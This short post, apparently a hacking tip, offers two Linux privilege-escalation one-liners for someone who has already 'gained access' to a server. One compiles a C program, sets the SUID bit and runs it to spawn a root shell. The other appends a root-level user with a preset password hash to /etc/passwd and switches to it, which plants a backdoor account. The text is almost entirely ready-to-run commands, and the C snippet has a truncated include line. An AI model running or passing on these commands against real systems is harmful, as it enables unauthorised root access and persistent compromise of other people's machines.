Imagine the following scenario. You have gained access to a user with high privileges (not root), on a Linux server but you would like to escalate to root. There is no sudo command or other command for escalation available, What do you do? Here are two oneliners for escalating to root in Linux.
Compiling binary, setting setUID bit and running the file (requires privileges to set the SUID bit and gcc to be installed and executable)
echo -e ‘#include \n int main(int argc, char *argv[]) { setgid(getegid()); setuid(geteuid()); argv[0] = “bash”; execvp(argv[0], argv); }’ > test.c; gcc -Wall test.c -o test.o ; chmod +s test.o; ./test.o
Adding a new user with root privileges and change to this user (requires write access to /etc/passwd)
echo “testroot:aaDuWv0z5WkLo:0:0:root:/root:/bin/bash” >> /etc/passwd ; echo “Password for testroot is testroot – use perl print crypt to change”; su testroot